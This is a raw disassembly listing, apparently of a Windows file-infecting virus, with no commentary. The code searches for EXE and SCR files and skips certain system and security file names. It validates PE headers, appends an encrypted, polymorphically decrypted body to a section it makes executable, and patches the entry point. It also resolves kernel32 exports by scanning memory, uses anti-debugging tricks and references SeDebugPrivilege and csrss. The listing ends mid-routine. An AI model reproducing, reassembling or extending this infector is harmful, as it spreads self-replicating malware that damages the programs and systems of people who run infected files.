push eax
push 1
push edi
call dword ptr [ebp+103F26h]
mov [esp], edi
call dword ptr [ebp+103E62h]
sub al, al
lea edi, [ebp+104184h]
push eax
push eax
push eax
push dword ptr [ebp+103DCCh]
push 40001h
push esp
push 1
push edi
call dword ptr [ebp+104290h]
push esp
push 4
push edi
call dword ptr [ebp+104290h]
add esp, 14h
push dword ptr [ebp+104288h]
call dword ptr [ebp+103E9Eh]
; START OF FUNCTION CHUNK FOR sub_48812D
loc_488257: ; CODE XREF: sub_48812D+A�j
; sub_48812D+1F�j
pop edi
retn
; END OF FUNCTION CHUNK FOR sub_48812D
; =============== S U B R O U T I N E =======================================
sub_488259 proc near ; CODE XREF: fuck:00488427�p
; fuck:00488433�p ...
lea esi, [ebp+104184h]
push esi
call dword ptr [ebp+103EA2h]
cmp eax, 0FFFFFFFFh
jz locret_48832A
mov [ebp+104294h], eax
push 0
push esi
call dword ptr [ebp+103EDEh]
test eax, eax
jz locret_48832A
sub eax, eax
push eax
push eax
push 3
push eax
push 1
push 0C0000000h
push esi
call dword ptr [ebp+103E7Eh]
cmp eax, 0FFFFFFFFh
jz loc_4888AB
mov [ebp+104298h], eax
lea ecx, [ebp+10429Ch]
lea edx, [ebp+1042A4h]
push ecx
push edx
push 0
push eax
call dword ptr [ebp+103EAAh]
cmp eax, 0FFFFFFFFh
jz loc_48889F
push 0
push dword ptr [ebp+104298h]
call dword ptr [ebp+103EA6h]
cmp eax, 0FFFFFFFFh
jz loc_48889F
mov [ebp+1042ACh], eax
xor ecx, ecx
add eax, ebx
push ecx
push eax
push ecx
push 4
push ecx
push dword ptr [ebp+104298h]
call dword ptr [ebp+103E82h]
test eax, eax
jz loc_48889F
xor ecx, ecx
mov [ebp+1042B0h], eax
push ecx
push ecx
push ecx
push 0F001Fh
push eax
call dword ptr [ebp+103ECAh]
test eax, eax
jz loc_488877
mov [ebp+1042B4h], eax
locret_48832A: ; CODE XREF: sub_488259+10�j
; sub_488259+27�j ...
retn
sub_488259 endp
; ---------------------------------------------------------------------------
loc_48832B: ; CODE XREF: sub_48845B+188�p
; sub_48845B+2A0�p
mov eax, 7327h
mov ecx, [ebx+38h]
; ---------------------------------------------------------------------------
db 0F7h ;
db 85h ;
db 0C0h ;
db 39h ; 9
db 10h
db 0
db 0
db 0
db 0
; ---------------------------------------------------------------------------
and [ebp+6], dh
add eax, [ebp+101069h]
xor edx, edx
add eax, ecx
div ecx
mul ecx
mov [ebp+1042C0h], eax
mov eax, 29CBh
mov ecx, [ebx+3Ch]
add eax, [ebp+101069h]
xor edx, edx
add eax, ecx
div ecx
mul ecx
mov [ebp+1042B8h], eax
retn
; =============== S U B R O U T I N E =======================================
sub_488370 proc near ; CODE XREF: sub_48845B:loc_4884D0�p
; sub_48845B+1B4�p
movzx ecx, word ptr [ebx+6]
stc
loc_488375: ; CODE XREF: sub_488370+23�j
jecxz short locret_4883AC
lea edx, [ebx+18h]
movzx eax, word ptr [ebx+14h]
add edx, eax
dec ecx
imul eax, ecx, 28h
add edx, eax
cmp dword ptr [edx], 6E69775Fh
stc
jz short locret_4883AC
cmp dword ptr [edx+0Ch], 1
jb short loc_488375
mov ecx, [ebx+3Ch]
mov eax, [edx+14h]
add eax, [edx+10h]
lea eax, [eax+ecx*2-1]
neg ecx
and eax, ecx
cmp eax, [ebp+1042ACh]
locret_4883AC: ; CODE XREF: sub_488370:loc_488375�j
; sub_488370+1D�j ...
retn
sub_488370 endp
; =============== S U B R O U T I N E =======================================
sub_4883AD proc near ; CODE XREF: fuck:00488445�p
arg_C = dword ptr 10h
mov edx, [esp+arg_C]
xor eax, eax
pop dword ptr [edx+0B8h]
retn
sub_4883AD endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_4883BA: ; CODE XREF: fuck:004883DB�j
mov ecx, edi
jmp short loc_4883C9
; ---------------------------------------------------------------------------
lea edi, [ebp+104184h]
cld
loc_4883C5: ; CODE XREF: fuck:004883D7�j
mov ebx, edi
xor ecx, ecx
loc_4883C9: ; CODE XREF: fuck:004883BC�j
; fuck:004883DF�j
lodsb
cmp al, 61h
jb short loc_4883D4
cmp al, 7Ah
ja short loc_4883D4
sub al, 20h
loc_4883D4: ; CODE XREF: fuck:004883CC�j
; fuck:004883D0�j
stosb
cmp al, 5Ch
jz short loc_4883C5
cmp al, 2Eh
jz short loc_4883BA
cmp al, 0
jnz short loc_4883C9
jecxz short locret_4883AC
mov eax, [ecx]
cmp eax, 455845h
jz short loc_4883F7
cmp eax, 524353h
jnz locret_48832A
loc_4883F7: ; CODE XREF: fuck:004883EA�j
mov eax, [ebx]
cmp eax, 434E4957h
jz locret_48832A
cmp eax, 4E554357h
jz locret_48832A
cmp eax, 32334357h
jz locret_48832A
cmp eax, 4F545350h
jz locret_48832A
xor ebx, ebx
call sub_488259
jnz short loc_48843E
call sub_48812D
call sub_488259
jz locret_48832A
loc_48843E: ; CODE XREF: fuck:0048842C�j
xor edx, edx
call sub_48845B
call sub_4883AD
call $+5
pop ebp
sub ebp, 10344Fh
jmp loc_488855
; =============== S U B R O U T I N E =======================================
sub_48845B proc near ; CODE XREF: fuck:00488440�p
var_14 = dword ptr -14h
push dword ptr fs:[edx]
mov esi, [ebp+1042B4h]
mov fs:[edx], esp
cmp word ptr [esi], 5A4Dh
jnz loc_488855
mov ebx, [esi+3Ch]
add ebx, esi
cmp word ptr [ebx], 4550h
jnz loc_488855
test dword ptr [ebx+16h], 2000h
jnz loc_488855
test byte ptr [ebx+5Ch], 2
jz loc_488855
mov eax, [ebx+8]
cmp eax, 0A0A0A0A0h
jz loc_488855
cmp eax, 20202020h
jz loc_488855
mov ecx, [ebx+0C8h]
jecxz short loc_4884D0
push ecx
call sub_487414
add ecx, [ebp+1042F8h]
add ecx, esi
and dword ptr [ecx+40h], 0
and dword ptr [ecx+44h], 0
loc_4884D0: ; CODE XREF: sub_48845B+5D�j
call sub_488370
jb loc_488855
and dword ptr [ebp+1042FCh], 0
mov eax, [edx+8]
mov ecx, [edx+10h]
sub eax, ecx
jnb short loc_4884F0
xor eax, eax
jmp short loc_4884F5
; ---------------------------------------------------------------------------
loc_4884F0: ; CODE XREF: sub_48845B+8F�j
add ecx, eax
mov [edx+10h], ecx
loc_4884F5: ; CODE XREF: sub_48845B+93�j
mov [ebp+1042BCh], eax
add ecx, [edx+0Ch]
mov eax, 10000h
push ecx
call near ptr dword_486B50+43h
xor [ebp+1039BEh], dl
mov cl, 20h
xor [ebp+1039BFh], dh
loc_488517: ; CODE XREF: sub_48845B+D5�j
push 20h
dec cl
pop eax
js short loc_488532
call near ptr dword_486B50+43h
test edx, edx
setz dl
shl edx, cl
xor [ebp+1039C0h], edx
jmp short loc_488517
; ---------------------------------------------------------------------------
loc_488532: ; CODE XREF: sub_48845B+C1�j
test dword ptr [ebp+1039C0h], 2000000h
jz short loc_488560
test dword ptr [ebp+1039C0h], 3
jnz short loc_488556
and dword ptr [ebp+1039C0h], 0F7FFFFFFh
jmp short loc_488560
; ---------------------------------------------------------------------------
loc_488556: ; CODE XREF: sub_48845B+ED�j
or dword ptr [ebp+1039C0h], 10000000h
loc_488560: ; CODE XREF: sub_48845B+E1�j
; sub_48845B+F9�j ...
push 6
pop ecx
loc_488566: ; CODE XREF: sub_48845B+129�j
push 6
pop eax
call near ptr dword_486B50+43h
mov al, [ebp+1039B8h]
xchg al, [edx+ebp+1039B8h]
mov [ebp+1039B8h], al
loop loc_488566
test dword ptr [ebp+1039C0h], 8
jnz short loc_48859B
cmp byte ptr [ebp+1039BAh], 1
jz short loc_488560
loc_48859B: ; CODE XREF: sub_48845B+135�j
test dword ptr [ebp+1039C0h], 10000000h
jz short loc_4885C2
cmp byte ptr [ebp+1039B8h], 5
jz short loc_488560
cmp byte ptr [ebp+1039B9h], 5
jz short loc_488560
cmp byte ptr [ebp+1039BAh], 5
jz short loc_488560
loc_4885C2: ; CODE XREF: sub_48845B+14A�j
test dword ptr [ebp+1039C0h], 400000h
jz short loc_4885D7
cmp byte ptr [ebp+1039B8h], 2
ja short loc_488560
loc_4885D7: ; CODE XREF: sub_48845B+171�j
and dword ptr [ebp+104300h], 0
call loc_487855
call loc_48832B
call sub_48885E
mov ebx, [ebp+1042B8h]
add ebx, [ebp+1042BCh]
call sub_488259
jz loc_488855
mov esi, [ebp+1042B4h]
mov ebx, [esi+3Ch]
add ebx, esi
call sub_488370
jb loc_488855
or dword ptr [edx+24h], 0E0000060h
mov edi, esi
push edx
push esi
add edi, [edx+14h]
add edi, [edx+10h]
test dword ptr [ebp+1039C0h], 20000000h
jnz short loc_48864B
mov [ebp+104304h], edi
lea esi, [ebp+1039CCh]
mov ecx, [ebp+101069h]
rep movsb
loc_48864B: ; CODE XREF: sub_48845B+1DA�j
push edi
mov ecx, 0A73h
lea esi, [ebp+101000h]
rep movsd
mov cl, 0
jecxz short loc_48865F
rep movsb
loc_48865F: ; CODE XREF: sub_48845B+200�j
test dword ptr [ebp+1039C0h], 20000000h
jz loc_48871D
push dword ptr [ebx+28h]
call sub_487414
mov edx, [ebp+1042F4h]
test edx, edx
jz loc_48871D
mov esi, [ebp+1042B4h]
mov ecx, [edx+10h]
or dword ptr [edx+24h], 0E0000060h
sub ecx, [edx+8]
jnb short loc_48869C
xor ecx, ecx
loc_48869C: ; CODE XREF: sub_48845B+23D�j
add esi, [edx+14h]
cmp ecx, [ebp+101069h]
mov ecx, [ebp+101069h]
jb short loc_488703
mov edi, [esp+14h+var_14]
and dword ptr [ebp+101069h], 0
and dword ptr [edi+69h], 0
mov edi, [edx+8]
add [edx+8], ecx
add esi, edi
xchg esi, edi
mov eax, [ebp+1042C8h]
test dword ptr [ebp+1039C0h], 40h
jz short loc_4886DC
neg dword ptr [eax]
loc_4886DC: ; CODE XREF: sub_48845B+27D�j
add esi, [edx+0Ch]
sub [eax], esi
mov [ebp+104300h], esi
mov esi, [ebx+28h]
add [eax], esi
test dword ptr [ebp+1039C0h], 40h
jz short loc_4886FA
neg dword ptr [eax]
loc_4886FA: ; CODE XREF: sub_48845B+29B�j
push ecx
call loc_48832B
pop ecx
jmp short loc_48870F
; ---------------------------------------------------------------------------
loc_488703: ; CODE XREF: sub_48845B+250�j
add esi, [ebx+28h]
sub esi, [edx+0Ch]
push ecx
push esi
rep movsb
pop edi
pop ecx
loc_48870F: ; CODE XREF: sub_48845B+2A6�j
lea esi, [ebp+1039CCh]
mov [ebp+104304h], edi
rep movsb
loc_48871D: ; CODE XREF: sub_48845B+20E�j
; sub_48845B+224�j
pop edi
pop esi
rdtsc
xchg eax, edx
lea eax, [edi+137h]
cmp dl, [ebp+1039BEh]
jnz short loc_488736
imul edx, 12345678h
loc_488736: ; CODE XREF: sub_48845B+2D3�j
mov [eax-19h], dx
call sub_486120
pop edx
mov ecx, [edx+0Ch]
add ecx, [edx+10h]
test dword ptr [ebp+1039C0h], 20000000h
lea eax, [ecx+5]
jnz short loc_488768
mov [ebp+104300h], ecx
add eax, [ebp+101069h]
and dword ptr [edi+69h], 0
loc_488768: ; CODE XREF: sub_48845B+2F8�j
sub eax, [ebx+28h]
mov [edi+54h], eax
test dword ptr [ebp+103F7Ch], 1
jz short loc_488784
mov dword ptr [ebx+8], 0A0A0A0A0h
loc_488784: ; CODE XREF: sub_48845B+320�j
test dword ptr [ebp+1039C0h], 400000h
jz short loc_488797
push edx
call sub_487EF1
pop edx
loc_488797: ; CODE XREF: sub_48845B+333�j
mov ecx, [ebp+104300h]
jecxz short loc_4887A4
mov [ebx+28h], ecx
jmp short loc_4887B1
; ---------------------------------------------------------------------------
loc_4887A4: ; CODE XREF: sub_48845B+342�j
mov ecx, [ebp+1042FCh]
jecxz short loc_4887AE
jmp short loc_4887B1
; ---------------------------------------------------------------------------
loc_4887AE: ; CODE XREF: sub_48845B+34F�j
mov ecx, [ebx+28h]
loc_4887B1: ; CODE XREF: sub_48845B+347�j
; sub_48845B+351�j
test dword ptr [ebp+1039C0h], 3
jz short loc_4887D1
mov eax, [ebp+104304h]
add ecx, [ebp+1042ECh]
add eax, [ebp+1042E8h]
add [eax], ecx
loc_4887D1: ; CODE XREF: sub_48845B+360�j
mov ecx, [edx+10h]
mov eax, [ebp+1042B8h]
cmp [edx+8], ecx
jnb short loc_4887E2
mov [edx+8], ecx
loc_4887E2: ; CODE XREF: sub_48845B+382�j
add [edx+10h], eax
and dword ptr [ebx+58h], 0
mov eax, [ebp+1042C0h]
push 29CCh
add [edx+8], eax
pop ecx
add [ebx+50h], eax
mov dl, [ebp+1039BEh]
test dword ptr [ebp+1039C0h], 20000000h
jz short loc_488813
add ecx, [ebp+101069h]
loc_488813: ; CODE XREF: sub_48845B+3B0�j
mov dh, 0
test dword ptr [ebp+1039C0h], 20000h
jnz short loc_488835
inc dh
test dword ptr [ebp+1039C0h], 40000h
jnz short loc_488835
mov dh, [ebp+1039BFh]
loc_488835: ; CODE XREF: sub_48845B+3C4�j
; sub_48845B+3D2�j
test dword ptr [ebp+1039C0h], 4000h
jnz short loc_48884C
loc_488841: ; CODE XREF: sub_48845B+3ED�j
mov al, [edi]
add al, dl
stosb
add dl, dh
loop loc_488841
jmp short loc_488855
; ---------------------------------------------------------------------------
loc_48884C: ; CODE XREF: sub_48845B+3E4�j
; sub_48845B+3F8�j
mov al, [edi]
xor al, dl
stosb
add dl, dh
loop loc_48884C
loc_488855: ; CODE XREF: fuck:00488456�j
; sub_48845B+11�j ...
xor edx, edx
mov esp, fs:[edx]
pop dword ptr fs:[edx]
pop eax
sub_48845B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_48885E proc near ; CODE XREF: sub_48845B+18D�p
cmp dword ptr [ebp+104298h], 0
jz locret_48832A
push dword ptr [ebp+1042B4h]
call dword ptr [ebp+103EEEh]
loc_488877: ; CODE XREF: sub_488259+C5�j
push dword ptr [ebp+1042B0h]
call dword ptr [ebp+103E62h]
lea ecx, [ebp+10429Ch]
lea edx, [ebp+1042A4h]
push ecx
push edx
push 0
push dword ptr [ebp+104298h]
call dword ptr [ebp+103EE2h]
loc_48889F: ; CODE XREF: sub_488259+6B�j
; sub_488259+82�j ...
push dword ptr [ebp+104298h]
call dword ptr [ebp+103E62h]
loc_4888AB: ; CODE XREF: sub_488259+45�j
lea esi, [ebp+104184h]
push dword ptr [ebp+104294h]
push esi
call dword ptr [ebp+103EDEh]
and dword ptr [ebp+104298h], 0
retn
sub_48885E endp
; ---------------------------------------------------------------------------
dw 0E8h
dd 5D000000h, 0ED81016Ah, 1038CBh, 0C10FF058h, 10158885h
dd 0C3C08500h, 0F0FFC883h, 8885C10Fh, 0C3001015h, 2A00103Dh
dd 661C7500h, 0C247C81h, 1375716Ch, 0FFC4E860h, 575FFFFh
dd 0FFFAB5E8h, 0FFD2E8FFh, 2E61FFFFh, 56782DFFh, 25B81234h
dd 60000000h, 0FFFFA5E8h, 8B3975FFh, 8D302444h, 104184B5h
dd 8508B00h, 63A8166h, 56257302h, 0FF000068h, 6AC48B00h
dd 0FF505200h, 103F2E95h, 8C48300h, 3F5C3E81h, 3755C3Fh
dd 0E804C683h, 0FFFFFA62h, 0FFFF7FE8h, 0B8C361FFh, 74h
dd 2FB8B1EBh, 0E8000000h, 1Dh, 0B80020C2h, 30h, 10E8h
dd 24C200h, 185B8h, 3E800h, 2CC20000h, 24548D00h, 832ECD0Ch
dd 197C00F8h, 0E860h, 548B0000h, 8B5D3024h, 0A2ED811Ah
dd 0E8001039h, 0FFFFE0B3h, 4C261h, 6030207h, 36930501h
dd 0B1A74486h, 0FFE7B9E8h, 0FF8B80FFh
; ---------------------------------------------------------------------------
cld
push ebp
mov ebp, esp
call sub_4889E5
mov ebx, ebx
mov eax, eax
call loc_488AA4
jmp short $+2
jmp loc_488A21
; =============== S U B R O U T I N E =======================================
sub_4889E5 proc near ; CODE XREF: fuck:004889D0�p
push dword ptr fs:0
xor dword ptr ds:loc_47C6AA+3, ebp
stc
stc
xchg ebx, ebx
cmc
mov fs:0, esp
xor eax, eax
push eax
push 80000000h
push 800h
push eax
push 2000h
push 2000h
push eax
push 4
push eax
call ds:dword_47C039 ; GetProcAddress
loc_488A21: ; CODE XREF: fuck:004889E0�j
stc
sub eax, eax
loc_488A24: ; CODE XREF: sub_4889E5+45�j
dec al
or al, al
jz short loc_488A2E
jnz short loc_488A24
jmp short loc_488A95
; ---------------------------------------------------------------------------
loc_488A2E: ; CODE XREF: sub_4889E5+43�j
nop
sub edi, edi
sub ecx, ecx
cmc
mov cl, 0F5h
mov ecx, ecx
cmc
loc_488A39: ; CODE XREF: sub_4889E5+58�j
lea edi, [edi+1]
clc
loop loc_488A39
mov eax, eax
nop
call sub_488A58
nop
cmc
cld
sub_4889E5 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_488A4A proc near ; CODE XREF: sub_488A58:loc_488A6C�p
mov al, [ebx]
xor ax, di
stc
xchg al, [ebx]
cmc
xchg ebx, ebx
retn
sub_488A4A endp
; ---------------------------------------------------------------------------
jmp short $+2
; =============== S U B R O U T I N E =======================================
sub_488A58 proc near ; CODE XREF: sub_4889E5+5D�p
pop ebx
cld
clc
add ebx, 1991h
push ebx
xor edx, edx
or edx, 2AB4h
xchg ebx, ebx
loc_488A6C: ; CODE XREF: sub_488A58+28�j
call sub_488A4A
xchg ebx, ebx
nop
add ebx, 1
sub edx, 1
xchg ebx, ebx
stc
cmp edx, 0
jnz short loc_488A6C
pop ebx
nop
mov ebp, 0
mov eax, eax
cmc
mov edi, [ebp-8]
mov fs:0, edi
loc_488A95: ; CODE XREF: sub_4889E5+47�j
cld
jmp short $+2
jmp short $+2
nop
leave
cmc
cmc
jmp ebx
sub_488A58 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 87h, 0DBh
; ---------------------------------------------------------------------------
jmp short $+2
loc_488AA4: ; CODE XREF: fuck:004889D9�p
mov eax, [eax+eax+0]
; ---------------------------------------------------------------------------
dd 0EEh dup(0)
dd 9B470000h, 8AD7C80h, 3317C83h, 7C91h, 126h dup(0)
dd 12FFE0h, 133Dh dup(0)
; ---------------------------------------------------------------------------
loc_48E000: ; DATA XREF: fuck:00491308�o
call $+5
cld
mov eax, [esp]
mov ecx, [eax+29BBh]
mov [eax+3303h], ebx
and ecx, 400000h
mov ebx, [esp+4]
jz short loc_48E04D
pop ecx
mov [eax+3307h], esi
mov cl, [eax+29BFh]
mov [eax+330Bh], edi
cmp cl, 0E8h
jz short loc_48E041
mov ebx, [eax+29C1h]
jmp short loc_48E04B
; ---------------------------------------------------------------------------
loc_48E041: ; CODE XREF: fuck:0048E037�j
mov ecx, [eax+29C0h]
mov ebx, [ecx+ebx+2]
loc_48E04B: ; CODE XREF: fuck:0048E03F�j
mov ebx, [ebx]
loc_48E04D: ; CODE XREF: fuck:0048E01F�j
push ebp
mov ebp, eax
sub dword ptr [esp+4], 11A11h
sub ebp, 101005h
mov edi, [esp+4]
lea esi, [ebp+1039CCh]
mov ecx, 99h
rep movsb
sldt cx
test ecx, ecx
jnz short loc_48E07B
or eax, 0FFFFFFFFh
int 2Eh ; DOS 2+ internal - EXECUTE COMMAND
; DS:SI -> counted CR-terminated command string
loc_48E07B: ; CODE XREF: fuck:0048E074�j
and ebx, 0FFFFF000h
loc_48E081: ; CODE XREF: fuck:0048E090�j
cmp dword ptr [ebx+4Eh], 73696854h
jz short loc_48E092
loc_48E08A: ; CODE XREF: fuck:0048E09F�j
sub ebx, 100h
jnz short loc_48E081
loc_48E092: ; CODE XREF: fuck:0048E088�j
mov eax, ebx
add eax, [ebx+3Ch]
mov edx, [eax+78h]
cmp word ptr [eax], 4550h
jnz short loc_48E08A
add edx, ebx
mov esi, [edx+20h]
mov ecx, [edx+18h]
add esi, ebx
push ecx
loc_48E0AC: ; CODE XREF: fuck:loc_48E0C0�j
lodsd
add eax, ebx
cmp word ptr [eax+2], 5074h
jnz short loc_48E0C0
cmp dword ptr [eax+5], 6441636Fh
jz short loc_48E0C5
loc_48E0C0: ; CODE XREF: fuck:0048E0B5�j
loop loc_48E0AC
pop ecx
jmp short loc_48E0F0
; ---------------------------------------------------------------------------
loc_48E0C5: ; CODE XREF: fuck:0048E0BE�j
sub [esp], ecx
mov esi, [edx+24h]
pop ecx
add esi, ebx
movzx eax, word ptr [esi+ecx*2]
mov edi, [edx+1Ch]
add edi, ebx
mov esi, [edi+eax*4]
add esi, ebx
lea eax, [ebp+101137h]
lea ecx, [ebp+101120h]
mov dx, [eax-19h]
call ecx
jmp short loc_48E137
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48E17E
loc_48E0F0: ; CODE XREF: fuck:0048E0C3�j
; sub_48E17E+10�j ...
mov eax, [ebp+1039C0h]
and eax, 400000h
jz short loc_48E11C
lea esi, [ebp+1039C4h]
lodsd
mov edi, [esp+arg_0]
stosd
mov ebx, [ebp+104308h]
movsb
mov edi, [ebp+104310h]
mov esi, [ebp+10430Ch]
loc_48E11C: ; CODE XREF: sub_48E17E-83�j
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_48E17E
; ---------------------------------------------------------------------------
db 90h
db 79h
; =============== S U B R O U T I N E =======================================
sub_48E120 proc near ; CODE XREF: sub_49045B+2DF�p
push ebx
mov ecx, 2889h
mov ebx, edx
loc_48E128: ; CODE XREF: sub_48E120+13�j
xor [eax], dl
sub dl, bl
add eax, 1
xchg bl, bh
xchg dl, dh
loop loc_48E128
pop ebx
retn
sub_48E120 endp
; ---------------------------------------------------------------------------
loc_48E137: ; CODE XREF: fuck:0048E0EE�j
call near ptr loc_48E146+2
inc ebx
insb
outsd
jnb short near ptr loc_48E1A3+3
dec eax
popa
outsb
db 64h
insb
loc_48E146: ; CODE XREF: fuck:loc_48E137�p
add gs:[ebx-1], dl
setalc
mov [ebp+103E62h], eax
call near ptr loc_48E162+1
inc ebx
jb short loc_48E1BE
popa
jz short near ptr loc_48E1C0+1
inc ebp
jbe short near ptr loc_48E1C0+4
outsb
jz short loc_48E1A3
loc_48E162: ; CODE XREF: fuck:0048E151�p
add [ebx-1], dl
setalc
mov [ebp+103E66h], eax
call sub_48E17E
inc edi
db 65h
jz short near ptr loc_48E1C0+1
popa
jnb short near ptr loc_48E1EA+2
inc ebp
jb short near ptr loc_48E1EA+3
outsd
jb short $+2
; =============== S U B R O U T I N E =======================================
sub_48E17E proc near ; CODE XREF: fuck:0048E16C�p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0048E0F0 SIZE 0000002E BYTES
; FUNCTION CHUNK AT 0048E534 SIZE 0000000B BYTES
push ebx
call esi
mov [ebp+103E6Ah], eax
call sub_48E55F
test eax, eax
jz loc_48E0F0
push eax
call dword ptr [ebp+103E6Ah]
test eax, eax
jnz loc_48E534
loc_48E1A3: ; CODE XREF: fuck:0048E160�j
; fuck:0048E13F�j
cmp byte ptr [ebp+10153Fh], 1
jnz short loc_48E1C0
push dword ptr [ebp+104308h]
dec byte ptr [ebp+10153Fh]
pop dword ptr [ebp+101598h]
loc_48E1BE: ; CODE XREF: fuck:0048E157�j
jmp short loc_48E1C7
; ---------------------------------------------------------------------------
loc_48E1C0: ; CODE XREF: sub_48E17E+2C�j
; fuck:0048E15A�j ...
and dword ptr [ebp+101598h], 0
loc_48E1C7: ; CODE XREF: sub_48E17E:loc_48E1BE�j
and dword ptr [ebp+101588h], 0
and dword ptr [ebp+10158Ch], 0
and dword ptr [ebp+101590h], 0
push edi
mov byte ptr [ebp+1012D4h], 1
mov [ebp+103E6Eh], esi
loc_48E1EA: ; CODE XREF: fuck:0048E176�j
; fuck:0048E179�j
lea esi, [ebp+101604h]
xor ecx, ecx
lea edi, [ebp+103E7Ah]
mov cl, 20h
call sub_48E59C
pop edi
call dword ptr [ebp+103EBAh]
shr eax, 1Fh
jz loc_48E2E3
mov eax, [edi+14h]
push 40h
add eax, ebx
push 8001000h
mov [ebp+103E72h], eax
push 7328h
push 0
call dword ptr [ebp+103EF2h]
test eax, eax
jz loc_48E534
xchg eax, edi
lea esi, [ebp+101000h]
mov ebp, edi
mov ecx, 0CCAh
sub ebp, 101000h
lea edx, [ebp+101254h]
rep movsd
jmp edx
; ---------------------------------------------------------------------------
sub esp, 20h
mov edi, esp
push 8
xor eax, eax
pop ecx
lea edx, [ebp+101B4Dh]
rep stosd
mov edi, esp
mov [edi+10h], edx
inc byte ptr [edi+1Ch]
push edi
push 10003h
call dword ptr [ebp+103E72h]
add esp, 20h
test eax, eax
jz loc_48E534
xchg eax, edi
push 0
push 1
push 80000400h
push 10000h
call dword ptr [ebp+103E72h]
test eax, eax
jz loc_48E534
push 0
push eax
push 40000h
push 0
shr eax, 0Ch
push edi
push 1
push eax
push 10001h
call dword ptr [ebp+103E72h]
push 1000Ah
call dword ptr [ebp+103E72h]
call loc_48E2D3
jmp loc_48E534
; ---------------------------------------------------------------------------
loc_48E2D3: ; CODE XREF: sub_48E17E+14B�p
; sub_48E17E+162�j
push 1
pop ecx
jecxz short locret_48E2E2
push 0Ah
call dword ptr [ebp+103EE6h]
jmp short loc_48E2D3
; ---------------------------------------------------------------------------
locret_48E2E2: ; CODE XREF: sub_48E17E+158�j
retn
; ---------------------------------------------------------------------------
loc_48E2E3: ; CODE XREF: sub_48E17E+8B�j
cmp dword ptr [ebp+103E92h], 0
jz loc_48E534
call near ptr loc_48E2FA+1
dec esi
push esp
inc esp
dec esp
dec esp
loc_48E2FA: ; CODE XREF: sub_48E17E+172�p
add bh, bh
sub_48E17E endp ; sp-analysis failed
xchg eax, ebp
scasb
db 3Eh
adc [eax], al
lea esi, [ebp+1017DEh]
xor ecx, ecx
lea edi, [ebp+103EFAh]
mov cl, 0Eh
xchg eax, ebx
call sub_48E59C
cmp dword ptr [ebp+103F2Eh], 0
jz loc_48E534
mov eax, [ebp+103EFEh]
push dword ptr [eax+1]
pop dword ptr [ebp+103917h]
mov eax, [ebp+103F16h]
push dword ptr [eax+1]
pop dword ptr [ebp+103964h]
mov eax, [ebp+103F02h]
push dword ptr [eax+1]
pop dword ptr [ebp+10396Bh]
cmp dword ptr [ebp+10396Bh], 10000h
jnb loc_48E534
mov ecx, [ebp+103F06h]
jecxz short loc_48E383
push dword ptr [ecx+1]
pop dword ptr [ebp+103978h]
mov ecx, [ebp+103F0Eh]
jecxz short loc_48E383
push dword ptr [ecx+1]
pop dword ptr [ebp+103985h]
loc_48E383: ; CODE XREF: fuck:0048E367�j
; fuck:0048E378�j
call sub_48E540
lea edi, [ebp+103F84h]
mov ecx, edi
push 0
neg cl
push dword ptr [eax+4]
and ecx, 3
push 40h
add edi, ecx
push edi
push 0
push 18h
lea esi, [ebp+1015EBh]
mov ecx, 19h
lea eax, ds:0FFFFFFFEh[ecx*2]
stosw
lea eax, ds:0[ecx*2]
stosw
lea eax, [edi+4]
stosd
xor ah, ah
lea edx, [ebp+103E30h]
loc_48E3CC: ; CODE XREF: fuck:0048E3D5�j
lodsb
mov [edx], ax
stosw
add edx, 2
loop loc_48E3CC
mov edx, esp
push 0
push 7328h
mov ecx, esp
push 0
mov eax, esp
push 0
push 8000000h
push 40h
push ecx
push edx
push 0Eh
push eax
call dword ptr [ebp+103F0Ah]
pop eax
add esp, 40h
push 7328h
mov edx, esp
push 0
mov ecx, esp
push 40h
push 0
push 2
push edx
push 0
push 7328h
push 0
push ecx
push 0FFFFFFFFh
push eax
call dword ptr [ebp+103F12h]
pop edi
pop ecx
test edi, edi
jz loc_48E534
lea esi, [ebp+101000h]
mov ecx, 0CCAh
mov ebp, edi
rep movsd
sub ebp, 101000h
lea eax, [ebp+10144Ah]
jmp eax
; ---------------------------------------------------------------------------
dw 5450h
dd 0FF6A206Ah, 3F1A95FFh, 0C0850010h, 0E834755Fh, 14Fh
dd 11E8h, 44655300h, 67756265h, 76697250h, 67656C69h, 0E8570065h
dd 550h, 4288B5FFh, 95FF0010h, 103E9Eh, 6295FF57h, 6A00103Eh
dd 0FF026A00h, 103E9295h, 128B900h, 2B970000h, 240C89E1h
dd 95FF5754h, 103ED6h, 0A583F633h, 103F72h, 0FF575400h
dd 103EDA95h, 74C08500h, 0FE834666h, 0FFEE7204h, 6A082474h
dd 0FF2A6A00h, 103ED295h, 74C08500h, 88E893DCh, 33000005h
dd 3AE391C9h, 3F728539h, 32750010h, 24247C81h, 73727363h
dd 0C1812874h, 0EAFh, 56505450h, 53505051h, 3E8A95FFh
dd 0C0850010h, 0FF0F7459h, 8F082474h, 103F7285h, 0FDB5E800h
dd 0FF53FFFFh, 103E6295h, 818EEB00h, 128C4h, 95FF5700h
dd 103E62h
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48E17E
loc_48E534: ; CODE XREF: sub_48E17E+1F�j
; sub_48E17E+B2�j ...
call dword ptr [ebp+103E62h]
jmp loc_48E0F0
; END OF FUNCTION CHUNK FOR sub_48E17E
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_48E540 proc near ; CODE XREF: fuck:loc_48E383�p
; sub_48E55F+2�p
pop edx
push 0
push 0
push 0
push 0
push 40001h
mov eax, esp
push 0
push eax
push 0Ch
mov eax, esp
jmp edx
sub_48E540 endp
; ---------------------------------------------------------------------------
aVx_4_1 db 'Vx_4',0
db 0
; =============== S U B R O U T I N E =======================================
sub_48E55F proc near ; CODE XREF: sub_48E17E+9�p
xor ecx, ecx
call sub_48E540
lea edx, [ebp+101559h]
push edx
push ecx
push ecx
push eax
call dword ptr [ebp+103E66h]
add esp, 20h
retn
sub_48E55F endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
dd 585858h, 3328h, 0E73h, 3 dup(0)
dd 29C0h, 0
; =============== S U B R O U T I N E =======================================
sub_48E59C proc near ; CODE XREF: sub_48E17E+7C�p
